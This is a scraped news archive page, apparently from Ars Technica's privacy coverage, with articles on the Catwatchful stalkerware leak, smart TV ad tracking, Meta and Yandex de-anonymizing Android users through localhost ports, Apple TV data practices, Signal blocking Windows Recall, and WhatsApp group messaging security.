privacy

provider-of-covert-surveillance-app-spills-passwords-for-62,000-users

Provider of covert surveillance app spills passwords for 62,000 users

The maker of a phone app that is advertised as providing a stealthy means for monitoring all activities on an Android device spilled email addresses, plain-text passwords, and other sensitive data belonging to 62,000 users, a researcher discovered recently.

A security flaw in the app, branded Catwatchful, allowed researcher Eric Daigle to download a trove of sensitive data, which belonged to account holders who used the covert app to monitor phones. The leak, made possible by a SQL injection vulnerability, allowed anyone who exploited it to access the accounts and all data stored in them.

Unstoppable

Catwatchful creators emphasize the app’s stealth and security. While the promoters claim the app is legal and intended for parents monitoring their children’s online activities, the emphasis on stealth has raised concerns that it’s being aimed at people with other agendas.

“Catwatchful is invisible,” a page promoting the app says. “It cannot be detected. It cannot be uninstalled. It cannot be stopped. It cannot be closed. Only you can access the information it collects.”

The promoters go on to say users “can monitor a phone without [owners] knowing with mobile phone monitoring software. The app is invisible and undetectable on the phone. It works in a hidden and stealth mode.”

Provider of covert surveillance app spills passwords for 62,000 users Read More »

smart-tv-os-owners-face-“constant-conflict”-between-privacy,-advertiser-demands

Smart TV OS owners face “constant conflict” between privacy, advertiser demands

DENVER—Most smart TV operating system (OS) owners are in the ad sales business now. Software providers for budget and premium TVs are honing their ad skills, which requires advancing their ability to collect user data. This is creating an “inherent conflict” within the industry, Takashi Nakano, VP of content and programming at Samsung TV Plus, said at the StreamTV Show in Denver last week.

During a panel at StreamTV Insider’s conference entitled “CTV OS Leader Roundtable: From Drivers to Engagement and Content Strategy,” Nakano acknowledged the opposing needs of advertisers and smart TV users, who are calling for a reasonable amount of data privacy.

“Do you want your data sold out there and everyone to know exactly what you’ve been watching … the answer is generally no,” the Samsung executive said. “Yet, advertisers want all of this data. They wanna know exactly what you ate for breakfast.”

Nakano also suggested that the owners of OSes targeting smart TVs and other streaming hardware, like streaming sticks, are inundated with user data that may not actually be that useful or imperative to collect:

I think that there’s inherent conflict in the ad ecosystem supplying so much data. … We’re fortunate to have all that data, but we’re also like, ‘Do we really want to give it all, and hand it all out?’ There’s a constant conflict around that, right? So how do we create an ecosystem where we can serve ads that are pretty good? Maybe it’s not perfect …

Today, connected TV (CTV) OSes are largely built around not just gathering user data, but also creating ways to collect new types of information about viewers in order to deliver more relevant, impactful ads. LG, for example, recently announced that its smart TV OS, webOS, will use a new AI model that informs ad placement based on viewers’ emotions and personal beliefs.

Smart TV OS owners face “constant conflict” between privacy, advertiser demands Read More »

meta-and-yandex-are-de-anonymizing-android-users’-web-browsing-identifiers

Meta and Yandex are de-anonymizing Android users’ web browsing identifiers


Abuse allows Meta and Yandex to attach persistent identifiers to detailed browsing histories.

Credit: Aurich Lawson | Getty Images

Credit: Aurich Lawson | Getty Images

Tracking code that Meta and Russia-based Yandex embed into millions of websites is de-anonymizing visitors by abusing legitimate Internet protocols, causing Chrome and other browsers to surreptitiously send unique identifiers to native apps installed on a device, researchers have discovered. Google says it’s investigating the abuse, which allows Meta and Yandex to convert ephemeral web identifiers into persistent mobile app user identities.

The covert tracking—implemented in the Meta Pixel and Yandex Metrica trackers—allows Meta and Yandex to bypass core security and privacy protections provided by both the Android operating system and browsers that run on it. Android sandboxing, for instance, isolates processes to prevent them from interacting with the OS and any other app installed on the device, cutting off access to sensitive data or privileged system resources. Defenses such as state partitioning and storage partitioning, which are built into all major browsers, store site cookies and other data associated with a website in containers that are unique to every top-level website domain to ensure they’re off-limits for every other site.

A blatant violation

“One of the fundamental security principles that exists in the web, as well as the mobile system, is called sandboxing,” Narseo Vallina-Rodriguez, one of the researchers behind the discovery, said in an interview. “You run everything in a sandbox, and there is no interaction within different elements running on it. What this attack vector allows is to break the sandbox that exists between the mobile context and the web context. The channel that exists allowed the Android system to communicate what happens in the browser with the identity running in the mobile app.”

The bypass—which Yandex began in 2017 and Meta started last September—allows the companies to pass cookies or other identifiers from Firefox and Chromium-based browsers to native Android apps for Facebook, Instagram, and various Yandex apps. The companies can then tie that vast browsing history to the account holder logged into the app.

This abuse has been observed only in Android, and evidence suggests that the Meta Pixel and Yandex Metrica target only Android users. The researchers say it may be technically feasible to target iOS because browsers on that platform allow developers to programmatically establish localhost connections that apps can monitor on local ports.

In contrast to iOS, however, Android imposes fewer controls on local host communications and background executions of mobile apps, the researchers said, while also implementing stricter controls in app store vetting processes to limit such abuses. This overly permissive design allows Meta Pixel and Yandex Metrica to send web requests with web tracking identifiers to specific local ports that are continuously monitored by the Facebook, Instagram, and Yandex apps. These apps can then link pseudonymous web identities with actual user identities, even in private browsing modes, effectively de-anonymizing users’ browsing habits on sites containing these trackers.

Meta Pixel and Yandex Metrica are analytics scripts designed to help advertisers measure the effectiveness of their campaigns. Meta Pixel and Yandex Metrica are estimated to be installed on 5.8 million and 3 million sites, respectively.

Meta and Yandex achieve the bypass by abusing basic functionality built into modern mobile browsers that allows browser-to-native app communications. The functionality lets browsers send web requests to local Android ports to establish various services, including media connections through the RTC protocol, file sharing, and developer debugging.

A conceptual diagram representing the exchange of identifiers between the web trackers running on the browser context and native Facebook, Instagram, and Yandex apps for Android.

A conceptual diagram representing the exchange of identifiers between the web trackers running on the browser context and native Facebook, Instagram, and Yandex apps for Android.

While the technical underpinnings differ, both Meta Pixel and Yandex Metrica are performing a “weird protocol misuse” to gain unvetted access that Android provides to localhost ports on the 127.0.0.1 IP address. Browsers access these ports without user notification. Facebook, Instagram, and Yandex native apps silently listen on those ports, copy identifiers in real time, and link them to the user logged into the app.

A representative for Google said the behavior violates the terms of service for its Play marketplace and the privacy expectations of Android users.

“The developers in this report are using capabilities present in many browsers across iOS and Android in unintended ways that blatantly violate our security and privacy principles,” the representative said, referring to the people who write the Meta Pixel and Yandex Metrica JavaScript. “We’ve already implemented changes to mitigate these invasive techniques and have opened our own investigation and are directly in touch with the parties.”

Meta didn’t answer emailed questions for this article, but provided the following statement: “We are in discussions with Google to address a potential miscommunication regarding the application of their policies. Upon becoming aware of the concerns, we decided to pause the feature while we work with Google to resolve the issue.”

Yandex representatives didn’t answer an email seeking comment.

How Meta and Yandex de-anonymize Android users

Meta Pixel developers have abused various protocols to implement the covert listening since the practice began last September. They started by causing apps to send HTTP requests to port 12387. A month later, Meta Pixel stopped sending this data, even though Facebook and Instagram apps continued to monitor the port.

In November, Meta Pixel switched to a new method that invoked WebSocket, a protocol for two-way communications, over port 12387.

That same month, Meta Pixel also deployed a new method that used WebRTC, a real-time peer-to-peer communication protocol commonly used for making audio or video calls in the browser. This method used a complicated process known as SDP munging, a technique for JavaScript code to modify Session Description Protocol data before it’s sent. Still in use today, the SDP munging by Meta Pixel inserts key _fbp cookie content into fields meant for connection information. This causes the browser to send that data as part of a STUN request to the Android local host, where the Facebook or Instagram app can read it and link it to the user.

In May, a beta version of Chrome introduced a mitigation that blocked the type of SDP munging that Meta Pixel used. Within days, Meta Pixel circumvented the mitigation by adding a new method that swapped the STUN requests with the TURN requests.

In a post, the researchers provided a detailed description of the _fbp cookie from a website to the native app and, from there, to the Meta server:

1. The user opens the native Facebook or Instagram app, which eventually is sent to the background and creates a background service to listen for incoming traffic on a TCP port (12387 or 12388) and a UDP port (the first unoccupied port in 12580–12585). Users must be logged-in with their credentials on the apps.

2. The user opens their browser and visits a website integrating the Meta Pixel.

3. At this stage, some websites wait for users’ consent before embedding Meta Pixel. In our measurements of the top 100K website homepages, we found websites that require consent to be a minority (more than 75% of affected sites does not require user consent)…

4. The Meta Pixel script is loaded and the _fbp cookie is sent to the native Instagram or Facebook app via WebRTC (STUN) SDP Munging.

5. The Meta Pixel script also sends the _fbp value in a request to https://www.facebook.com/tr along with other parameters such as page URL (dl), website and browser metadata, and the event type (ev) (e.g., PageView, AddToCart, Donate, Purchase).

6. The Facebook or Instagram apps receive the _fbp cookie from the Meta JavaScripts running on the browser and transmits it to the GraphQL endpoint (https://graph[.]facebook[.]com/graphql) along with other persistent user identifiers, linking users’ fbp ID (web visit) with their Facebook or Instagram account.

Detailed flow of the way the Meta Pixel leaks the _fbp cookie from Android browsers to it’s Facebook and Instagram apps.

Detailed flow of the way the Meta Pixel leaks the _fbp cookie from Android browsers to it’s Facebook and Instagram apps.

The first known instance of Yandex Metrica linking websites visited in Android browsers to app identities was in May 2017, when the tracker started sending HTTP requests to local ports 29009 and 30102. In May 2018, Yandex Metrica also began sending the data through HTTPS to ports 29010 and 30103. Both methods remained in place as of publication time.

An overview of Yandex identifier sharing

An overview of Yandex identifier sharing

A timeline of web history tracking by Meta and Yandex

A timeline of web history tracking by Meta and Yandex

Some browsers for Android have blocked the abusive JavaScript in trackers. DuckDuckGo, for instance, was already blocking domains and IP addresses associated with the trackers, preventing the browser from sending any identifiers to Meta. The browser also blocked most of the domains associated with Yandex Metrica. After the researchers notified DuckDuckGo of the incomplete blacklist, developers added the missing addresses.

The Brave browser, meanwhile, also blocked the sharing of identifiers due to its extensive blocklists and existing mitigation to block requests to the localhost without explicit user consent. Vivaldi, another Chromium-based browser, forwards the identifiers to local Android ports when the default privacy setting is in place. Changing the setting to block trackers appears to thwart browsing history leakage, the researchers said.

Tracking blocker settings in Vivaldi for Android.

There’s got to be a better way

The various remedies DuckDuckGo, Brave, Vivaldi, and Chrome have put in place are working as intended, but the researchers caution they could become ineffective at any time.

“Any browser doing blocklisting will likely enter into a constant arms race, and it’s just a partial solution,” Vallina Rodriguez said of the current mitigations. “Creating effective blocklists is hard, and browser makers will need to constantly monitor the use of this type of capability to detect other hostnames potentially abusing localhost channels and then updating their blocklists accordingly.”

He continued:

While this solution works once you know the hostnames doing that, it’s not the right way of mitigating this issue, as trackers may find ways of accessing this capability (e.g., through more ephemeral hostnames). A long-term solution should go through the design and development of privacy and security controls for localhost channels, so that users can be aware of this type of communication and potentially enforce some control or limit this use (e.g., a permission or some similar user notifications).

Chrome and most other Chromium-based browsers executed the JavaScript as Meta and Yandex intended. Firefox did as well, although for reasons that aren’t clear, the browser was not able to successfully perform the SDP munging specified in later versions of the code. After blocking the STUN variant of SDP munging in the early May beta release, a production version of Chrome released two weeks ago began blocking both the STUN and TURN variants. Other Chromium-based browsers are likely to implement it in the coming weeks. A representative for Firefox-maker Mozilla said the organization prioritizes user privacy and is taking the report seriously

“We are actively investigating the reported behavior, and working to fully understand its technical details and implications,” Mozilla said in an email. “Based on what we’ve seen so far, we consider these to be severe violations of our anti-tracking policies, and are assessing solutions to protect against these new tracking techniques.”

The researchers warn that the current fixes are so specific to the code in the Meta and Yandex trackers that it would be easy to bypass them with a simple update.

“They know that if someone else comes in and tries a different port number, they may bypass this protection,” said Gunes Acar, the researcher behind the initial discovery, referring to the Chrome developer team at Google. “But our understanding is they want to send this message that they will not tolerate this form of abuse.”

Fellow researcher Vallina-Rodriguez said the more comprehensive way to prevent the abuse is for Android to overhaul the way it handles access to local ports.

“The fundamental issue is that the access to the local host sockets is completely uncontrolled on Android,” he explained. “There’s no way for users to prevent this kind of communication on their devices. Because of the dynamic nature of JavaScript code and the difficulty to keep blocklists up to date, the right way of blocking this persistently is by limiting this type of access at the mobile platform and browser level, including stricter platform policies to limit abuse.”

Got consent?

The researchers who made this discovery are:

  • Aniketh Girish, PhD student at IMDEA Networks
  • Gunes Acar, assistant professor in Radboud University’s Digital Security Group & iHub
  • Narseo Vallina-Rodriguez, associate professor at IMDEA Networks
  • Nipuna Weerasekara, PhD student at IMDEA Networks
  • Tim Vlummens, PhD student at COSIC, KU Leuven

Acar said he first noticed Meta Pixel accessing local ports while visiting his own university’s website.

There’s no indication that Meta or Yandex has disclosed the tracking to either websites hosting the trackers or end users who visit those sites. Developer forums show that many websites using Meta Pixel were caught off guard when the scripts began connecting to local ports.

“Since 5th September, our internal JS error tracking has been flagging failed fetch requests to localhost: 12387,” one developer wrote. “No changes have been made on our side, and the existing Facebook tracking pixel we use loads via Google Tag Manager.”

“Is there some way I can disable this?” another developer encountering the unexplained local port access asked.

It’s unclear whether browser-to-native-app tracking violates any privacy laws in various countries. Both Meta and companies hosting its Meta Pixel, however, have faced a raft of lawsuits in recent years alleging that the data collected violates privacy statutes. A research paper from 2023 found that Meta pixel, then called the Facebook Pixel, “tracks a wide range of user activities on websites with alarming detail, especially on websites classified as sensitive categories under GDPR,” the abbreviation for the European Union’s General Data Protection Regulation.

So far, Google has provided no indication that it plans to redesign the way Android handles local port access. For now, the most comprehensive protection against Meta Pixel and Yandex Metrica tracking is to refrain from installing the Facebook, Instagram, or Yandex apps on Android devices.

Photo of Dan Goodin

Dan Goodin is Senior Security Editor at Ars Technica, where he oversees coverage of malware, computer espionage, botnets, hardware hacking, encryption, and passwords. In his spare time, he enjoys gardening, cooking, and following the independent music scene. Dan is based in San Francisco. Follow him at here on Mastodon and here on Bluesky. Contact him on Signal at DanArs.82.

Meta and Yandex are de-anonymizing Android users’ web browsing identifiers Read More »

breaking-down-why-apple-tvs-are-privacy-advocates’-go-to-streaming-device

Breaking down why Apple TVs are privacy advocates’ go-to streaming device


Using the Apple TV app or an Apple account means giving Apple more data, though.

Credit: Aurich Lawson | Getty Images

Credit: Aurich Lawson | Getty Images

Every time I write an article about the escalating advertising and tracking on today’s TVs, someone brings up Apple TV boxes. Among smart TVs, streaming sticks, and other streaming devices, Apple TVs are largely viewed as a safe haven.

“Just disconnect your TV from the Internet and use an Apple TV box.”

That’s the common guidance you’ll hear from Ars readers for those seeking the joys of streaming without giving up too much privacy. Based on our research and the experts we’ve consulted, that advice is pretty solid, as Apple TVs offer significantly more privacy than other streaming hardware providers.

But how private are Apple TV boxes, really? Apple TVs don’t use automatic content recognition (ACR, a user-tracking technology leveraged by nearly all smart TVs and streaming devices), but could that change? And what about the software that Apple TV users do use—could those apps provide information about you to advertisers or Apple?

In this article, we’ll delve into what makes the Apple TV’s privacy stand out and examine whether users should expect the limited ads and enhanced privacy to last forever.

Apple TV boxes limit tracking out of the box

One of the simplest ways Apple TVs ensure better privacy is through their setup process, during which you can disable Siri, location tracking, and sending analytics data to Apple. During setup, users also receive several opportunities to review Apple’s data and privacy policies. Also off by default is the boxes’ ability to send voice input data to Apple.

Most other streaming devices require users to navigate through pages of settings to disable similar tracking capabilities, which most people are unlikely to do. Apple’s approach creates a line of defense against snooping, even for those unaware of how invasive smart devices can be.

Apple TVs running tvOS 14.5 and later also make third-party app tracking more difficult by requiring such apps to request permission before they can track users.

“If you choose Ask App Not to Track, the app developer can’t access the system advertising identifier (IDFA), which is often used to track,” Apple says. “The app is also not permitted to track your activity using other information that identifies you or your device, like your email address.”

Users can access the Apple TV settings and disable the ability of third-party apps to ask permission for tracking. However, Apple could further enhance privacy by enabling this setting by default.

The Apple TV also lets users control which apps can access the set-top box’s Bluetooth functionality, photos, music, and HomeKit data (if applicable), and the remote’s microphone.

“Apple’s primary business model isn’t dependent on selling targeted ads, so it has somewhat less incentive to harvest and monetize incredible amounts of your data,” said RJ Cross, director of the consumer privacy program at the Public Interest Research Group (PIRG). “I personally trust them more with my data than other tech companies.”

What if you share analytics data?

If you allow your Apple TV to share analytics data with Apple or app developers, that data won’t be personally identifiable, Apple says. Any collected personal data is “not logged at all, removed from reports before they’re sent to Apple, or protected by techniques, such as differential privacy,” Apple says.

Differential privacy, which injects noise into collected data, is one of the most common methods used for anonymizing data. In support documentation (PDF), Apple details its use of differential privacy:

The first step we take is to privatize the information using local differential privacy on the user’s device. The purpose of privatization is to assure that Apple’s servers don’t receive clear data. Device identifiers are removed from the data, and it is transmitted to Apple over an encrypted channel. The Apple analysis system ingests the differentially private contributions, dropping IP addresses and other metadata. The final stage is aggregation, where the privatized records are processed to compute the relevant statistics, and the aggregate statistics are then shared with relevant Apple teams. Both the ingestion and aggregation stages are performed in a restricted access environment so even the privatized data isn’t broadly accessible to Apple employees.

What if you use an Apple account with your Apple TV?

Another factor to consider is Apple’s privacy policy regarding Apple accounts, formerly Apple IDs.

Apple support documentation says you “need” an Apple account to use an Apple TV, but you can use the hardware without one. Still, it’s common for people to log into Apple accounts on their Apple TV boxes because it makes it easier to link with other Apple products. Another reason someone might link an Apple TV box with an Apple account is to use the Apple TV app, a common way to stream on Apple TV boxes.

So what type of data does Apple harvest from Apple accounts? According to its privacy policy, the company gathers usage data, such as “data about your activity on and use of” Apple offerings, including “app launches within our services…; browsing history; search history; [and] product interaction.”

Other types of data Apple may collect from Apple accounts include transaction information (Apple says this is “data about purchases of Apple products and services or transactions facilitated by Apple, including purchases on Apple platforms”), account information (“including email address, devices registered, account status, and age”), device information (including serial number and browser type), contact information (including physical address and phone number), and payment information (including bank details). None of that is surprising considering the type of data needed to make an Apple account work.

Many Apple TV users can expect Apple to gather more data from their Apple account usage on other devices, such as iPhones or Macs. However, if you use the same Apple account across multiple devices, Apple recognizes that all the data it has collected from, for example, your iPhone activity, also applies to you as an Apple TV user.

A potential workaround could be maintaining multiple Apple accounts. With an Apple account solely dedicated to your Apple TV box and Apple TV hardware and software tracking disabled as much as possible, Apple would have minimal data to ascribe to you as an Apple TV owner. You can also use your Apple TV box without an Apple account, but then you won’t be able to use the Apple TV app, one of the device’s key features.

Data collection via the Apple TV app

You can download third-party apps like Netflix and Hulu onto an Apple TV box, but most TV and movie watching on Apple TV boxes likely occurs via the Apple TV app. The app is necessary for watching content on the Apple TV+ streaming service, but it also drives usage by providing access to the libraries of many (but not all) popular streaming apps in one location. So understanding the Apple TV app’s privacy policy is critical to evaluating how private Apple TV activity truly is.

As expected, some of the data the app gathers is necessary for the software to work. That includes, according to the app’s privacy policy, “information about your purchases, downloads, activity in the Apple TV app, the content you watch, and where you watch it in the Apple TV app and in connected apps on any of your supported devices.” That all makes sense for ensuring that the app remembers things like which episode of Severance you’re on across devices.

Apple collects other data, though, that isn’t necessary for functionality. It says it gathers data on things like the “features you use (for example, Continue Watching or Library),” content pages you view, how you interact with notifications, and approximate location information (that Apple says doesn’t identify users) to help improve the app.

Additionally, Apple tracks the terms you search for within the app, per its policy:

We use Apple TV search data to improve models that power Apple TV. For example, aggregate Apple TV search queries are used to fine-tune the Apple TV search model.

This data usage is less intrusive than that of other streaming devices, which might track your activity and then sell that data to third-party advertisers. But some people may be hesitant about having any of their activities tracked to benefit a multi-trillion-dollar conglomerate.

Data collected from the Apple TV app used for ads

By default, the Apple TV app also tracks “what you watch, your purchases, subscriptions, downloads, browsing, and other activities in the Apple TV app” to make personalized content recommendations. Content recommendations aren’t ads in the traditional sense but instead provide a way for Apple to push you toward products by analyzing data it has on you.

You can disable the Apple TV app’s personalized recommendations, but it’s a little harder than you might expect since you can’t do it through the app. Instead, you need to go to the Apple TV settings and then select Apps > TV > Use Play History > Off.

The most privacy-conscious users may wish that personalized recommendations were off by default. Darío Maestro, senior legal fellow at the nonprofit Surveillance Technology Oversight Project (STOP), noted to Ars that even though Apple TV users can opt out of personalized content recommendations, “many will not realize they can.”

Apple can also use data it gathers on you from the Apple TV app to serve traditional ads. If you allow your Apple TV box to track your location, the Apple TV app can also track your location. That data can “be used to serve geographically relevant ads,” according to the Apple TV app privacy policy. Location tracking, however, is off by default on Apple TV boxes.

Apple’s tvOS doesn’t have integrated ads. For comparison, some TV OSes, like Roku OS and LG’s webOS, show ads on the OS’s home screen and/or when showing screensavers.

But data gathered from the Apple TV app can still help Apple’s advertising efforts. This can happen if you allow personalized ads in other Apple apps serving targeted apps, such as Apple News, the App Store, or Stocks. In such cases, Apple may apply data gathered from the Apple TV app, “including information about the movies and TV shows you purchase from Apple, to serve ads in those apps that are more relevant to you,” the Apple TV app privacy policy says.

Apple also provides third-party advertisers and strategic partners with “non-personal data” gathered from the Apple TV app:

We provide some non-personal data to our advertisers and strategic partners that work with Apple to provide our products and services, help Apple market to customers, and sell ads on Apple’s behalf to display on the App Store and Apple News and Stocks.

Apple also shares non-personal data from the Apple TV with third parties, such as content owners, so they can pay royalties, gauge how much people are watching their shows or movies, “and improve their associated products and services,” Apple says.

Apple’s policy notes:

For example, we may share non-personal data about your transactions, viewing activity, and region, as well as aggregated user demographics[,] such as age group and gender (which may be inferred from information such as your name and salutation in your Apple Account), to Apple TV strategic partners, such as content owners, so that they can measure the performance of their creative work [and] meet royalty and accounting requirements.

When reached for comment, an Apple spokesperson told Ars that Apple TV users can clear their play history from the app.

All that said, the Apple TV app still shares far less data with third parties than other streaming apps. Netflix, for example, says it discloses some personal information to advertising companies “in order to select Advertisements shown on Netflix, to facilitate interaction with Advertisements, and to measure and improve effectiveness of Advertisements.”

Warner Bros. Discovery says it discloses information about Max viewers “with advertisers, ad agencies, ad networks and platforms, and other companies to provide advertising to you based on your interests.” And Disney+ users have Nielsen tracking on by default.

What if you use Siri?

You can easily deactivate Siri when setting up an Apple TV. But those who opt to keep the voice assistant and the ability to control Apple TV with their voice take somewhat of a privacy hit.

According to the privacy policy accessible in Apple TV boxes’ settings, Apple boxes automatically send all Siri requests to Apple’s servers. If you opt into using Siri data to “Improve Siri and Dictation,” Apple will store your audio data. If you opt out, audio data won’t be stored, but per the policy:

In all cases, transcripts of your interactions will be sent to Apple to process your requests and may be stored by Apple.

Apple TV boxes also send audio and transcriptions of dictation input to Apple servers for processing. Apple says it doesn’t store the audio but may store transcriptions of the audio.

If you opt to “Improve Siri and Dictation,” Apple says your history of voice requests isn’t tied to your Apple account or email. But Apple is vague about how long it may store data related to voice input performed with the Apple TV if you choose this option.

The policy states:

Your request history, which includes transcripts and any related request data, is associated with a random identifier for up to six months and is not tied to your Apple Account or email address. After six months, you request history is disassociated from the random identifier and may be retained for up to two years. Apple may use this data to develop and improve Siri, Dictation, Search, and limited other language processing functionality in Apple products …

Apple may also review a subset of the transcripts of your interactions and this … may be kept beyond two years for the ongoing improvements of products and services.

Apple promises not to use Siri and voice data to build marketing profiles or sell them to third parties, but it hasn’t always adhered to that commitment. In January, Apple agreed to pay $95 million to settle a class-action lawsuit accusing Siri of recording private conversations and sharing them with third parties for targeted ads. In 2019, contractors reported hearing private conversations and recorded sex via Siri-gathered audio.

Outside of Apple, we’ve seen voice request data used questionably, including in criminal trials and by corporate employees. Siri and dictation data also represent additional ways a person’s Apple TV usage might be unexpectedly analyzed to fuel Apple’s business.

Automatic content recognition

Apple TVs aren’t preloaded with automatic content recognition (ACR), an Apple spokesperson confirmed to Ars, another plus for privacy advocates. But ACR is software, so Apple could technically add it to Apple TV boxes via a software update at some point.

Sherman Li, the founder of Enswers, the company that first put ACR in Samsung TVs, confirmed to Ars that it’s technically possible for Apple to add ACR to already-purchased Apple boxes. Years ago, Enswers retroactively added ACR to other types of streaming hardware, including Samsung and LG smart TVs. (Enswers was acquired by Gracenote, which Nielsen now owns.)

In general, though, there are challenges to adding ACR to hardware that people already own, Li explained:

Everyone believes, in theory, you can add ACR anywhere you want at any time because it’s software, but because of the way [hardware is] architected… the interplay between the chipsets, like the SoCs, and the firmware is different in a lot of situations.

Li pointed to numerous variables that could prevent ACR from being retroactively added to any type of streaming hardware, “including access to video frame buffers, audio streams, networking connectivity, security protocols, OSes, and app interface communication layers, especially at different levels of the stack in these devices, depending on the implementation.”

Due to the complexity of Apple TV boxes, Li suspects it would be difficult to add ACR to already-purchased Apple TVs. It would likely be simpler for Apple to release a new box with ACR if it ever decided to go down that route.

If Apple were to add ACR to old or new Apple TV boxes, the devices would be far less private, and the move would be highly unpopular and eliminate one of the Apple TV’s biggest draws.

However, Apple reportedly has a growing interest in advertising to streaming subscribers. The Apple TV+ streaming service doesn’t currently show commercials, but the company is rumored to be exploring a potential ad tier. The suspicions stem from a reported meeting between Apple and the United Kingdom’s ratings body, Barb, to discuss how it might track ads on Apple TV+, according to a July report from The Telegraph.

Since 2023, Apple has also hired several prominent names in advertising, including a former head of advertising at NBCUniversal and a new head of video ad sales. Further, Apple TV+ is one of the few streaming services to remain ad-free, and it’s reported to be losing Apple $1 billion per year since its launch.

One day soon, Apple may have much more reason to care about advertising in streaming and being able to track the activities of people who use its streaming offerings. That has implications for Apple TV box users.

“The more Apple creeps into the targeted ads space, the less I’ll trust them to uphold their privacy promises. You can imagine Apple TV being a natural progression for selling ads,” PIRG’s Cross said.

Somewhat ironically, Apple has marketed its approach to privacy as a positive for advertisers.

“Apple’s commitment to privacy and personal relevancy builds trust amongst readers, driving a willingness to engage with content and ads alike,” Apple’s advertising guide for buying ads on Apple News and Stocks reads.

The most private streaming gadget

It remains technologically possible for Apple to introduce intrusive tracking or ads to Apple TV boxes, but for now, the streaming devices are more private than the vast majority of alternatives, save for dumb TVs (which are incredibly hard to find these days). And if Apple follows its own policies, much of the data it gathers should be kept in-house.

However, those with strong privacy concerns should be aware that Apple does track certain tvOS activities, especially those that happen through Apple accounts, voice interaction, or the Apple TV app. And while most of Apple’s streaming hardware and software settings prioritize privacy by default, some advocates believe there’s room for improvement.

For example, STOP’s Maestro said:

Unlike in the [European Union], where the upcoming Data Act will set clearer rules on transfers of data generated by smart devices, the US has no real legislation governing what happens with your data once it reaches Apple’s servers. Users are left with little way to verify those privacy promises.

Maestro suggested that Apple could address these concerns by making it easier for people to conduct security research on smart device software. “Allowing the development of alternative or modified software that can evaluate privacy settings could also increase user trust and better uphold Apple’s public commitment to privacy,” Maestro said.

There are ways to limit the amount of data that advertisers can get from your Apple TV. But if you use the Apple TV app, Apple can use your activity to help make business decisions—and therefore money.

As you might expect from a device that connects to the Internet and lets you stream shows and movies, Apple TV boxes aren’t totally incapable of tracking you. But they’re still the best recommendation for streaming users seeking hardware with more privacy and fewer ads.

Photo of Scharon Harding

Scharon is a Senior Technology Reporter at Ars Technica writing news, reviews, and analysis on consumer gadgets and services. She’s been reporting on technology for over 10 years, with bylines at Tom’s Hardware, Channelnomics, and CRN UK.

Breaking down why Apple TVs are privacy advocates’ go-to streaming device Read More »

“microsoft-has-simply-given-us-no-other-option,”-signal-says-as-it-blocks-windows-recall

“Microsoft has simply given us no other option,” Signal says as it blocks Windows Recall

But the changes go only so far in limiting the risks Recall poses. As I pointed out, when Recall is turned on, it indexes Zoom meetings, emails, photos, medical conditions, and—yes—Signal conversations, not just with the user, but anyone interacting with that user, without their knowledge or consent.

Researcher Kevin Beaumont performed his own deep-dive analysis that also found that some of the new controls were lacking. For instance, Recall continued to screenshot his payment card details. It also decrypted the database with a simple fingerprint scan or PIN. And it’s unclear whether the type of sophisticated malware that routinely infects consumer and enterprise Windows users will be able to decrypt encrypted database contents.

And as Cunningham also noted, Beaumont found that Microsoft still provided no means for developers to prevent content displayed in their apps from being indexed. That left Signal developers at a disadvantage, so they had to get creative.

With no API for blocking Recall in the Windows Desktop version, Signal is instead invoking an API Microsoft provides for protecting copyrighted material. App developers can turn on the DRM setting to prevent Windows from taking screenshots of copyrighted content displayed in the app. Signal is now repurposing the API to add an extra layer of privacy.

“We hope that the AI teams building systems like Recall will think through these implications more carefully in the future,” Signal wrote Wednesday. “Apps like Signal shouldn’t have to implement ‘one weird trick’ in order to maintain the privacy and integrity of their services without proper developer tools. People who care about privacy shouldn’t be forced to sacrifice accessibility upon the altar of AI aspirations either.”

Signal’s move will lessen the chances of Recall permanently indexing private messages, but it also has its limits. The measure only provides protection when all parties to a chat—at least those using the Windows Desktop version—haven’t changed the default settings.

Microsoft officials didn’t immediately respond to an email asking why Windows provides developers with no granular control over Recall and whether the company has plans to add any.

“Microsoft has simply given us no other option,” Signal says as it blocks Windows Recall Read More »

whatsapp-provides-no-cryptographic-management-for-group-messages

WhatsApp provides no cryptographic management for group messages

The flow of adding new members to a WhatsApp group message is:

  • A group member sends an unsigned message to the WhatsApp server that designates which users are group members, for instance, Alice, Bob, and Charlie
  • The server informs all existing group members that Alice, Bob, and Charlie have been added
  • The existing members have the option of deciding whether to accept messages from Alice, Bob, and Charlie, and whether messages exchanged with them should be encrypted

With no cryptographic signatures verifying an existing member who wants to add a new member, additions can be made by anyone with the ability to control the server or messages that flow into it. Using the common fictional scenario for illustrating end-to-end encryption, this lack of cryptographic assurance leaves open the possibility that Malory can join a group and gain access to the human-readable messages exchanged there.

WhatsApp isn’t the only messenger lacking cryptographic assurances for new group members. In 2022, a team that included some of the same researchers that analyzed WhatsApp found that Matrix—an open source and proprietary platform for chat and collaboration clients and servers—also provided no cryptographic means for ensuring only authorized members join a group. The Telegram messenger, meanwhile, offers no end-to-end encryption for group messages, making the app among the weakest for ensuring the confidentiality of group messages.

By contrast, the open source Signal messenger provides a cryptographic assurance that only an existing group member designated as the group admin can add new members. In an email, researcher Benjamin Dowling, also of King’s College, explained:

Signal implements “cryptographic group management.” Roughly this means that the administrator of a group, a user, signs a message along the lines of “Alice, Bob and Charley are in this group” to everyone else. Then, everybody else in the group makes their decision on who to encrypt to and who to accept messages from based on these cryptographically signed messages, [meaning] who to accept as a group member. The system used by Signal is a bit different [than WhatsApp], since [Signal] makes additional efforts to avoid revealing the group membership to the server, but the core principles remain the same.

On a high-level, in Signal, groups are associated with group membership lists that are stored on the Signal server. An administrator of the group generates a GroupMasterKey that is used to make changes to this group membership list. In particular, the GroupMasterKey is sent to other group members via Signal, and so is unknown to the server. Thus, whenever an administrator wants to make a change to the group (for instance, invite another user), they need to create an updated membership list (authenticated with the GroupMasterKey) telling other users of the group who to add. Existing users are notified of the change and update their group list, and perform the appropriate cryptographic operations with the new member so the existing member can begin sending messages to the new members as part of the group.

Most messaging apps, including Signal, don’t certify the identity of their users. That means there’s no way Signal can verify that the person using an account named Alice does, in fact, belong to Alice. It’s fully possible that Malory could create an account and name it Alice. (As an aside, and in sharp contrast to Signal, the account members that belong to a given WhatsApp group are visible to insiders, hackers, and to anyone with a valid subpoena.)

WhatsApp provides no cryptographic management for group messages Read More »

that-groan-you-hear-is-users’-reaction-to-recall-going-back-into-windows

That groan you hear is users’ reaction to Recall going back into Windows

Security and privacy advocates are girding themselves for another uphill battle against Recall, the AI tool rolling out in Windows 11 that will screenshot, index, and store everything a user does every three seconds.

